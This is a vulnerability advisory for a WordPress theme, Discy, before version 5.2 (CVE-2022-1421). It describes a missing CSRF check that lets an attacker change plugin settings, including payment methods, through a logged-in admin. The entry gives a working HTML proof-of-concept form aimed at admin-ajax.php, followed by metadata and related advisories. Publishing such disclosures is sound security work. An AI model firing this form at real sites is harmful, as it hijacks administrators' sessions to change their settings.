Discy < 5.2 – Settings Update via CSRF | CVE 2022-1421 | Theme Vulnerabilities

Description

The theme lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary plugin's settings including payment methods via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_update_options">
      <input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
      <input type="submit" value="Submit request">
    </form>
  </body>
</html>

Affects Themes

Fixed in 5.2

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bibek Neupane

Submitter

Bibek Neupane

Submitter twitter

Verified

Yes

WPVDB ID

a7a24e8e-9056-4967-bcad-b96cc0c5b249

Timeline

Publicly Published

2022-05-16 (about 3 years ago)

Added

2022-05-16 (about 3 years ago)

Last Updated

2022-05-17 (about 3 years ago)

Other

Published

Title

Published

2022-05-17

Title

Hot Linked Image Cacher <= 1.16 - Image upload/cache abuse via CSRF

Published

2025-04-09

Title

Foliopress WYSIWYG <= 2.6.18 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-11-23

Title

Bulk Comment Remove <= 2 - Cross-Site Request Forgery via brc_admin()

Published

2023-01-13

Title

Hover Image <= 1.4.1 - CSRF

Published

2021-06-30

Title

Global Multisite Search <= 1.0.1 - CSRF Bypass